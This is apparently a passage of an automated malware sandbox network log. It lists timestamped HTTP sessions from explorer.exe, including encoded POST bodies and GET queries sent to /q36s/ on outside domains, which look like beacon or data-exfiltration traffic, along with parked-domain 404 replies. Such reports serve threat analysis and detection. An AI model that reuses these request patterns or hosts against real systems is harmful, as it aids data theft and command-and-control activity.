45 6b 62 75 78 37 6c 35 7a 79 68 43 4b 45 75 6f 75 74 37 59 53 4c 56 39 4b 38 7a 7a 55 7e 74 75 71 78 68 45 47 46 45 62 42 70 6b 32 41 7e 56 47 42 67 50 78 77 7a 6f 42 73 4a 4f 4c 67 62 30 74 32 42 48 43 4c 41 57 67 57 44 69 49 61 42 57 50 55 36 6e 7a 58 78 47 36 44 6a 61 54 4f 34 63 28 74 46 6a 4b 75 47 4f 55 5a 6b 7a 44 6e 48 64 69 63 66 64 59 4e 77 54 7a 49 45 6c 74 4f 4c 5a 44 42 77 37 44 47 66 6e 78 39 67 34 52 4b 4c 4a 46 59 66 6d 36 4c 42 66 30 39 76 39 4e 70 77 76 37 6c 4d 55 71 67 6d 44 58 39 6d 74 28 31 37 43 46 75 59 4f 55 68 36 73 57 39 61 35 72 51 57 36 50 54 4d 57 33 78 4d 49 30 71 42 39 73 2d 41 6b 78 66 4f 43 61 52 34 78 39 6d 77 47 6b 41 75 7a 65 73 30 38 52 68 52 66 62 67 73 36 4f 41 4c 68 77 41 42 67 59 4d 57 56 45 43 6b 51 75 50 58 43 48 76 49 4e 31 5a 44 70 43 58 55 67 4b 47 70 6a 76 6c 46 71 48 41 6b 62 4e 79 30 4f 28 77 6c 54 76 47 70 6b 58 6f 76 37 57 37 47 62 51 74 4b 63 28 62 36 5a 4b 63 48 31 55 69 75 59 55 67 64 4a 50 4a 52 37 4e 31 54 30 54 4b 57 62 4b 38 78 45 39 65 30 35 61 33 76 54 28 63 31 5f 6f 78 50 63 36 4f 69 79 38 65 58 53 63 54 48 65 36 69 4f 33 78 43 4e 59 77 4b 4f 52 46 49 47 2d 4e 58 7e 76 6d 32 4e 79 4d 41 61 34 59 4c 66 36 37 56 33 34 49 44 4f 50 4a 4d 50 44 44 73 6d 70 77 52 4d 6b 42 4e 7a 41 68 4b 53 77 6f 74 67 54 6d 79 41 4d 65 34 50 32 4c 38 45 72 33 69 4c 71 79 63 61 34 4b 44 54 56 31 34 78 74 6c 75 67 4e 72 32 37 4b 32 78 70 79 42 74 28 6a 4c 31 58 44 51 6d 66 4f 68 38 57 69 63 73 49 69 7e 43 38 72 70 70 71 38 52 33 4b 63 77 32 4d 6c 4d 66 68 6b 30 6b 4c 45 46 36 76 6d 6e 42 6e 54 35 52 39 5f 30 35 6a 34 28 74 49 42 68 74 49 42 61 78 4c 61 43 79 42 41 69 45 30 71 4d 78 73 45 61 62 4b 52 4e 55 39 74 6a 78 65 2d 48 61 4a 49 59 57 6e 74 54 61 53 78 4b 74 46 32 77 39 56 52 66 62 78 39 6b 46 44 39 71 4b 63 70 55 4a 6c 68 61 4e 61 6e 73 63 7e 67 52 45 52 4e 4a 51 41 64 6d 46 36 61 4a 54 48 41 4c 55 4e 4e 59 75 6b 2d 71 70 49 64 67 72 70 35 79 48 78 50 44 36 62 45 65 46 64 6c 32 36 39 5a 55 4b 65 76 6b 4b 72 4d 4b 38 41 6f 53 77 7e 77 6f 44 66 35 54 31 68 44 52 53 37 4c 43 51 30 5f 7e 39 50 35 6f 74 44 74 41 50 65 54 45 68 46 45 37 6e 46 46 61 61 47 51 4e 73 77 55 74 6a 4d 64 37 73 34 36 77 46 7e 48 6a 38 43 6b 66 46 46 4f 6f 41 38 62 66 47 6b 7a 72 66 37 7a 52 38 52 5f 39 62 38 36 52 38 6a 75 35 4e 6c 70 4a 41 46 41 4e 34 51 77 32 64 34 62 6b 66 57 79 44 77 42 36 4b 4f 74 55 39 46 62 4e 6f 49 79 4a 56 33 55 44 6d 5f 58 74 79 6d 36 75 Data Ascii: 1bGpqN=agU2P4(BVuorkT1ArZ5uq2noyVsy6OfBw8whmJ6nXFm-cA5ydkDeloMWLJD8aFol5Wl0M2fO2fwYGEZEImJ33vdSWKxMHoQmw_VSwV2on8d8Arylv76-L5BwtVqK2qDNP4Tm4pChVB7Gu3ukl30mLKWUTScP8jI1sbHJaquFWvXfA2LEYVu3BVXeyN96i_4lFCkh(gboPDwEa1Ky0VXZkIHwql~hDMZhOqPaGrEB7HeSTDc_Z2oDYMAwvGPbr7IZwVhoyE5m2OMxRPPNVRpkjY6etY6yZd9KsIjboDUqoLagdJCtvEqU(0RoPH1qSWNHyoiPEGikpLstj96dvvdhyOlxm17pVDUPjQJMhUGZVTeoSP84ZYqH~lrwmSMSGNKyGrS6fXCwIVol2fB_qMPa4UIO48jUx44KmF5c03WClvI2M551wS2roATlDECZLSwaWDA3OtrUKWg-QzJMqH4E7PbIB2Yc5zz_9TZNtAGeTJRrPVXUFJ7Gm-39im2i~P8EqAcuv2wdStwU3bgEaHw1rE3CYcE-hzU6Pt2w1Ekbux7l5zyhCKEuout7YSLV9K8zzU~tuqxhEGFEbBpk2A~VGBgPxwzoBsJOLgb0t2BHCLAWgWDiIaBWPU6nzXxG6DjaTO4c(tFjKuGOUZkzDnHdicfdYNwTzIEltOLZDBw7DGfnx9g4RKLJFYfm6LBf09v9Npwv7lMUqgmDX9mt(17CFuYOUh6sW9a5rQW6PTMW3xMI0qB9s-AkxfOCaR4x9mwGkAuzes08RhRfbgs6OALhwABgYMWVECkQuPXCHvIN1ZDpCXUgKGpjvlFqHAkbNy0O(wlTvGpkXov7W7GbQtKc(b6ZKcH1UiuYUgdJPJR7N1T0TKWbK8xE9e05a3vT(c1_oxPc6Oiy8eXScTHe6iO3xCNYwKORFIG-NX~vm2NyMAa4YLf67V34IDOPJMPDDsmpwRMkBNzAhKSwotgTmyAMe4P2L8Er3iLqyca4KDTV14xtlugNr27K2xpyBt(jL1XDQmfOh8WicsIi~C8rppq8R3Kcw2MlMfhk0kLEF6vmnBnT5R9_05j4(tIBhtIBaxLaCyBAiE0qMxsEabKRNU9tjxe-HaJIYWntTaSxKtF2w9VRfbx9kFD9qKcpUJlhaNansc~gRERNJQAdmF6aJTHALUNNYuk-qpIdgrp5yHxPD6bEeFdl269ZUKevkKrMK8AoSw~woDf5T1hDRS7LCQ0_~9P5otDtAPeTEhFE7nFFaaGQNswUtjMd7s46wF~Hj8CkfFFOoA8bfGkzrf7zR8R_9b86R8ju5NlpJAFAN4Qw2d4bkfWyDwB6KOtU9FbNoIyJV3UDm_Xtym6uIBYMpwlaWtO2hpNgFlYZXYPkZTS542n7l-Rdr9bHqgoYUWu2~sn5rOV96KOlhIf6Yv6AAbu-ikf3kXnWHf~dQKrbu_ZqzZ1pNhOcNnZ1nLM8TGrtYKLyDYm-9ULNIkH7CehplbCXSoWK7FEKhcAvjt37E_MJtF~EAHJs~Bo0NsnsT0s99zxMxnp0BhKMaJRpuPj-KGfvdummuncrK6Og3xcBu4Ev9kh3VxZm(yy800cp392WAfrIObCF~w0o8yNEANrFbnsYPPjZDDPTA5cSXZ9f0P42YhtZCCDnZ_96RQo87ywQ8fmFjRaeRBFVDV4irtBOU6Op5266ftpNciOLYk2vnePzEBCl8jTGz1XMLxMYW2AIDzcfEE2VNbbdX4cQcw1UbIl-21ocxBAkiMitvwu8S3bWuf8sw_k3g4e2wWsld1WirPm2D-APZ9AsmcKHZOF7eh~fG0cKqA6bT639I1REgvMQLmMlzxX0dFYFRcmZHLORvRgzWgvvLzuikPxvI1aGlcors33eJLmV1EI09i0yMPuRTMyEhFc2LVhlX15gLTJglbakd5GejTDuvlhyXiL6MXlVHZXG4ziqv41VeFg52XoaSutFgyTqkTA9iiMFo2xTaXqt5RGQwdJAG_nmlG277xBAxgWlDqWcxwPzJc16Vo3MQlIW5u2_GzMsxjwFuvqk5ioY5lbQXgKVQEtBzBCrU2HkKLwS9dvZmKiL7gdM7SosR3N5eyk14wvUbctV0cdnngffGkPtbtzGDMRJtu4IA-QJg10iZsb_w4qVQkR3aJx-nuNroqexyjLzQqCTBTVvYblaLWLKWiuTquSI9LrggJeH~cznX5CiClChlpHR(jSHdQSFNG7wNtnHNwc-wkThr6(wRWQ-X4DKZijQDhBLimSC20QiV0Bigx~IgmSefHOmw4Qw5bsZk4H_StgCoq~4bVYhPk4BprN21f0if0Dl8V7oMnZeJ6boQdf5RkduqErsat0iW9Xo~hTYXIHjO5lZWJo42k0huRmoQajUVSxeiuFwNGdihGMqAOKXbLQDtcX1FtygawaikfxsB0Aou44zGfcFyFNUAzQ6L83vJ4WPXwFRfO4Cfq8xQQSj~i5USsD3w0TdTOXydmZQwppeBczagRzA1HproNRleg5lXG4rG7EAJGWn9tXyDPZiQyP3RKkyCWluvmGNDOYQvh4ITJ7cclpo(94ayN6iB7MytZ3VW7nsEDznvGz8a_DZ6FGxs2z_zbhRjPWZNCzPOcyYeTfwkjVpNkdK2M7lbqNbnGMAGKBKBWRedI0TNMOrpsm5PfBWwE1Yt5t1vuGIb1Fi8eLvp3GtLUtKrbjxLvw_m3RQYxeKeR~aLwW0iuwkkKZ7IO5tsm8MxCb3UhzlYDcsD1VtB-sbV2d4IJKhoAJ9ToI2yNe0EuxW3NOgEj9WBYqqDku34Oe5w93j3T1SnD6vgWqmfzT4qHSpYmifBuE9BIwiDcGwcNX8xFkdO9Z-YnNPJWFjmD3jWShWbfAa~g1DUgS38A2HxSSPzU9uOpoTM_q7(bO1DcmMGlKz2wL-fA6WaasSKsLcLU8PZJhqhe8bYret4GT-oQW-EVd0iy2wCaCnS0k_EaYZeYC3dnsGrQf10h~VvERVqRXslwvVocFiTx2Rb3ZPlnxDvhlwa0ZCzeZV3nP-X_R91Fak9UMdav7BW8(Wv2HvHb0p4n1dgA68zPBeGPPFwHxm23fIZdqatBj-m7vymb4wx1OiCN29aPRYj9b3d4MQvwfma3AM1ac_c_ZglzqaWhle78LTFCHZW_p4u2JfujS1j39r0p~8vfwN9iiRbOtTEGmWD1M8m2VWDZffMRDr2q3jefmXLkLaFw(d6aq-3exoqU4tsFCAP5YhFX7poMnR7dxxaEjkyyUNljtPTT3U0wW-tsBbDudgWf6FaZKE7PDOtnbELAx4N1Fmz4JFvnYYYyioig05hutVMsX2irTnf1lQSIM8R7VjX8LWZW8C5DATDIM8p1KEaSZ4PQEwisv_tGlNYrmXf8RRBAKoxu3Gemf8FXXTh5yiqdfScj2MPUA85p6J57ZDZEGclibs5169u68zVkw5l51OZ3f5Cx8XDi6m0SzBjJukTA7Kg128cvSWV7TY5U8BIKjyW_poLveZS23XNrl-asofC2WyuVhAizNzEpajxNwqqlmEGPlqD_6E4oEfUsp3lA6KjzRg68CorUgQmQ1ZXYmwe5fHTk2petloAu9xOK3vvKZU(hxQvUHPcw69eKmbeDUksK1ZOC8GiOTeo2HNIgegN3MPN8MBrENzxwZOx0Lbqrmm0SkO(jZcBxgZvqqWo7~jBTeNpX2UD_Oyourb5yHAZw3l5adVuIMiNnNVsXo93UBb~PRWmZdoHLUnibn4fk2mKVSkAOQ9SE8_hBM8u_H-kYq9JT5RKmnBLRXSA7h6jYrx6nIWTPGSquIo8ZMeAKIxN26V8XOFn5yCRCKvXL13RqYyz7Tj9ic7UwfrKGE5GCiEkTyo4o7Gq_SzPWJJhA3HwvhJZfaqrbaIw7nYg1F5LBQX6iciQPFl4CR9Ky(GaKAP96xPdZ~N4lB4TTOaqdXJNZw4(K39Lnj0kysxLY7yAp09LuBUizP3(E2b81T2y6PH7YUt16jAMRTpfsDNULxEt9Fc4g4H7c8MKChUqn1VleHR0Ilo(MIfS4g8osb3j_h1pEFPuwdouwrxkADQWEmbtF9d(b4J(Kh
Feb 9, 2022 13:09:10.079705954 CET	10591	OUT	Data Raw: 77 5a 6f 70 4e 2d 41 51 65 5f 39 77 6c 6d 77 36 42 66 7a 69 6d 37 69 38 77 7a 33 2d 6a 35 78 69 32 67 4c 68 4c 57 75 52 49 32 73 51 56 69 28 57 6e 58 4b 6e 44 7a 63 6b 32 6e 68 6c 4d 30 4c 58 53 74 31 57 58 77 31 69 73 54 37 37 43 7a 49 59 79 46 Data Ascii: wZopN-AQe_9wlmw6Bfzim7i8wz3-j5xi2gLhLWuRI2sQVi(WnXKnDzck2nhlM0LXSt1WXw1isT77CzIYyFS3j_ml0NYgoSnBZMEkx1eLzGZiMHNKVuu2J_4Jh8tkQlD0g0sjMoWbxmNs~hM4xrj8~ljd3KdVO486l6zeUs~3jPsebrtBRPskFXvKYrBmNkaozBzU9aBm~rf58mY1vqu5Pf(TQcwQMca2cDanE9SpWpWuGiSnf-c
Feb 9, 2022 13:09:10.079797983 CET	10611	OUT	Data Raw: 36 69 76 36 65 44 51 32 4e 6f 68 31 51 38 64 45 79 4c 39 75 37 4c 58 71 79 2d 66 4f 65 65 56 67 28 63 6e 35 45 5f 39 33 52 56 77 30 48 7a 4b 43 6f 74 47 38 37 7a 75 4a 7a 63 6e 5a 5a 78 49 49 6d 4e 43 44 45 58 51 41 4a 53 7e 43 6c 2d 74 4d 76 66 Data Ascii: 6iv6eDQ2Noh1Q8dEyL9u7LXqy-fOeeVg(cn5E_93RVw0HzKCotG87zuJzcnZZxIImNCDEXQAJS~Cl-tMvfwagEcOI0S2S3Z67ROkqabK~zC3SUzRv4NAGx9jkC~uck6N9csMEUghhinkrfSPJ8ETER2xrbAmJnk6giV1IIMzhA5N9VR8h1zdXMUVIlOZpdsYHApGWmEc4BytzGFtyA(ywp1om2oGDwWaTHgxRZpfSMY8Rx~6t7y
Feb 9, 2022 13:09:10.195720911 CET	10613	IN	HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2022 12:09:10 GMT Content-Type: text/html Content-Length: 867 Connection: close Server: Apache/2 Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT Accept-Ranges: bytes Age: 0 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.3	49840	66.96.160.139	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 9, 2022 13:09:10.081944942 CET	10612	OUT	GET /q36s/?1bGpqN=VigMRdHlcuoP+Sw3yuFwqC380HsjzcbE0b4n2u2ieXC1OCRINUCS2txvQYXeentP/kMQ&wFNT8=0jNDXxTXR8rtijfp HTTP/1.1 Host: www.perfectselfstorageaston.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 9, 2022 13:09:10.211285114 CET	10614	IN	HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2022 12:09:10 GMT Content-Type: text/html Content-Length: 867 Connection: close Server: Apache/2 Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT Accept-Ranges: bytes Age: 0 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.2.3	49842	104.21.36.34	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 9, 2022 13:09:15.239033937 CET	10622	OUT	POST /q36s/ HTTP/1.1 Host: www.computershit.net Connection: close Content-Length: 412 Cache-Control: no-cache Origin: http://www.computershit.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.computershit.net/q36s/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 31 62 47 70 71 4e 3d 68 30 63 46 34 33 54 72 6e 42 52 6c 4a 73 59 56 4a 41 6b 6c 7a 38 4f 49 64 47 61 53 41 70 4b 69 37 63 4d 68 48 51 70 59 74 65 43 37 4e 2d 4b 74 35 4c 68 41 55 57 4e 66 62 4c 64 32 48 58 6a 47 45 39 70 67 56 6d 6d 48 35 4e 55 55 72 47 6c 36 56 31 75 38 45 59 6f 48 4c 4a 64 59 73 47 4a 4a 39 49 66 31 6d 68 67 61 79 2d 50 52 7e 64 7a 5a 48 62 38 6f 4f 30 39 48 33 43 69 46 5a 65 75 43 79 75 38 65 78 72 6e 53 42 63 28 52 34 4c 37 74 31 35 42 71 6b 61 62 42 61 6d 6e 5a 67 34 4d 32 66 6d 30 55 30 76 68 4a 71 44 67 4d 55 53 37 74 61 61 73 6a 32 45 42 6a 6a 61 37 52 51 66 4a 72 6e 38 74 32 35 30 51 65 76 6f 39 38 77 61 54 43 70 71 34 75 4f 6d 28 44 79 67 38 56 48 5a 74 76 78 43 7a 63 74 37 65 46 7a 45 4e 72 41 39 4d 43 45 48 46 65 75 6e 53 73 38 4e 66 58 6f 53 72 78 63 39 34 55 55 63 45 45 57 76 69 5f 49 32 63 64 45 51 4d 78 74 31 69 46 4b 75 78 50 4b 34 43 45 42 48 67 53 68 44 74 30 74 6c 4b 32 7e 4b 50 72 54 67 70 4b 4d 7a 32 5f 33 31 53 37 6b 50 57 7a 7a 2d 57 54 71 36 4c 69 28 43 79 6a 51 69 68 67 7a 50 73 65 5a 4a 78 58 33 74 45 72 74 42 75 5a 78 45 56 46 70 65 56 5a 77 38 6f 68 7a 77 35 79 48 31 4c 65 75 49 70 6a 56 67 4a 70 65 51 36 4f 77 59 49 72 6b 47 74 5f 49 63 6e 32 69 36 6f 5a 41 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 1bGpqN=h0cF43TrnBRlJsYVJAklz8OIdGaSApKi7cMhHQpYteC7N-Kt5LhAUWNfbLd2HXjGE9pgVmmH5NUUrGl6V1u8EYoHLJdYsGJJ9If1mhgay-PR~dzZHb8oO09H3CiFZeuCyu8exrnSBc(R4L7t15BqkabBamnZg4M2fm0U0vhJqDgMUS7taasj2EBjja7RQfJrn8t250Qevo98waTCpq4uOm(Dyg8VHZtvxCzct7eFzENrA9MCEHFeunSs8NfXoSrxc94UUcEEWvi_I2cdEQMxt1iFKuxPK4CEBHgShDt0tlK2~KPrTgpKMz2_31S7kPWzz-WTq6Li(CyjQihgzPseZJxX3tErtBuZxEVFpeVZw8ohzw5yH1LeuIpjVgJpeQ6OwYIrkGt_Icn2i6oZAA).

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.2.3	49843	104.21.36.34	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 9, 2022 13:09:15.257500887 CET	10636	OUT	POST /q36s/ HTTP/1.1 Host: www.computershit.net Connection: close Content-Length: 36480 Cache-Control: no-cache Origin: http://www.computershit.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.computershit.net/q36s/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 31 62 47 70 71 4e 3d 68 30 63 46 34 79 36 79 71 56 6f 6c 48 63 55 6d 4f 32 6f 78 34 76 47 4b 4e 6d 65 42 50 49 57 39 28 6f 42 47 61 42 5a 68 73 66 36 6c 4a 4f 57 41 6f 63 31 59 55 58 39 32 44 49 35 79 57 6e 66 46 45 2d 5a 43 56 6d 71 48 34 4e 73 2d 72 6c 4e 45 56 57 4b 6a 4a 59 6f 5f 5a 4a 64 37 6e 6e 46 6f 39 49 62 44 6d 68 6f 4b 79 4e 72 52 73 76 37 5a 50 34 6b 5a 57 30 39 42 72 79 79 6a 64 65 53 54 79 75 55 47 78 72 4c 53 42 73 44 52 36 72 72 71 69 6f 42 70 74 71 62 45 66 6d 6e 36 75 59 4a 52 66 6d 78 48 30 71 42 4a 71 78 55 4d 53 54 62 74 4e 62 73 6b 35 55 42 69 6e 61 37 6d 42 50 45 33 6e 38 5a 78 35 77 49 52 76 61 68 38 7a 4b 54 44 75 35 49 6d 43 52 69 42 30 68 49 45 48 5a 68 47 77 58 50 45 74 5f 57 6c 6c 48 56 2d 63 50 56 5a 45 45 70 6b 73 48 53 6f 30 74 65 54 6f 53 71 47 63 39 34 36 55 59 41 45 57 70 47 5f 4a 51 51 64 51 69 30 77 7a 46 69 41 45 4f 77 4a 4f 34 4f 34 42 48 34 34 68 47 5a 65 74 57 6d 32 28 76 7a 72 44 42 70 46 5a 6a 32 39 34 56 53 70 76 76 57 38 7a 2d 57 78 71 37 4c 79 38 7a 75 6a 52 7a 68 67 30 70 59 65 59 35 78 58 37 4e 45 31 6a 68 79 4a 78 45 64 42 70 66 6b 73 7a 4b 49 68 7a 47 6c 79 47 51 33 65 74 34 70 6a 61 41 49 57 62 53 6e 62 39 50 77 44 30 47 74 6c 42 4b 36 6b 6a 72 4e 65 45 53 72 4f 47 62 68 78 37 46 35 55 4b 51 4e 6e 75 72 7a 78 43 68 36 2d 47 49 49 4b 35 4a 33 68 6a 52 63 64 66 75 7a 4f 4b 35 47 39 71 31 6e 6c 65 4f 59 65 52 42 76 45 67 6b 49 58 59 58 34 2d 5a 75 38 4a 4d 59 69 6b 5a 4e 50 69 4b 49 43 2d 32 4e 43 43 39 75 4e 6e 57 57 33 37 41 75 6d 6e 48 6f 65 41 51 69 36 52 76 59 5a 31 70 5a 65 77 33 49 48 79 58 78 28 72 34 68 75 64 36 46 48 58 64 71 73 6b 53 45 5a 41 53 66 78 4b 33 6c 30 54 50 34 6a 